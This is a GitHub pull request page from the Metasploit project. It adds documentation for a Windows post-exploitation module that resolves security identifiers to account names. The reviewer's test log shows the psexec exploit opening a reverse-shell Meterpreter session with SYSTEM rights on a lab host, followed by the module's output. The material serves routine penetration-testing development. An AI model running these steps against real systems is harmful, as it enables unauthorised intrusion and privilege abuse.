Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

resolve_sid: Add docs and resolve RuboCop violations #17921

Merged
merged 1 commit into from
Apr 24, 2023
Merged

resolve_sid: Add docs and resolve RuboCop violations #17921

merged 1 commit into from
Apr 24, 2023

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Apr 23, 2023 

msf6 > use post/windows/gather/resolve_sid
msf6 post(windows/gather/resolve_sid) > set sid S-1-5-32-544
sid => S-1-5-32-544
msf6 post(windows/gather/resolve_sid) > set session 1
session => 1
msf6 post(windows/gather/resolve_sid) > run

[*] SID Type: alias
[*] Name:     Administrators
[*] Domain:   BUILTIN
[*] Post module execution completed
msf6 post(windows/gather/resolve_sid) >

@bcoles bcoles added the docs label Apr 23, 2023
@bwatters-r7 bwatters-r7 self-assigned this Apr 24, 2023
@bwatters-r7
Copy link
Contributor

Testing

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] 10.5.134.159:445 - Connecting to the server...
[*] 10.5.134.159:445 - Authenticating to 10.5.134.159:445 as user 'msfuser'...
[*] 10.5.134.159:445 - Selecting PowerShell target
[*] 10.5.134.159:445 - Executing the payload...
[*] Sending stage (175686 bytes) to 10.5.134.159
[+] 10.5.134.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.159:64613) at 2023-04-24 17:00:22 -0500

meterpreter > sysinfo
Computer        : APT_WIN2016X64
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : TESTDOMAIN
Logged On Users : 4
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsid
Server SID: S-1-5-18
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/psexec) > use post/windows/gather/resolve_sid
msf6 post(windows/gather/resolve_sid) > set session 1
session => 1
msf6 post(windows/gather/resolve_sid) > set sid S-1-5-18
sid => S-1-5-18
msf6 post(windows/gather/resolve_sid) > run

[*] SID Type: user
[*] Name:     SYSTEM
[*] Domain:   NT AUTHORITY
[*] Post module execution completed
msf6 post(windows/gather/resolve_sid) >

@bwatters-r7
Copy link
Contributor

Release Notes

This add documentation for the module post/windows/gather/resolve_sid

@bwatters-r7 bwatters-r7 merged commit b052386 into rapid7:master Apr 24, 2023
@adfoster-r7 adfoster-r7 added the rn-enhancement release notes enhancement label Apr 24, 2023
@bwatters-r7 bwatters-r7 mentioned this pull request Apr 24, 2023
Merged
@bcoles bcoles deleted the resolve_sid branch April 25, 2023 01:30
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@bwatters-r7 bwatters-r7

Labels
docs rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@bcoles @bwatters-r7 @adfoster-r7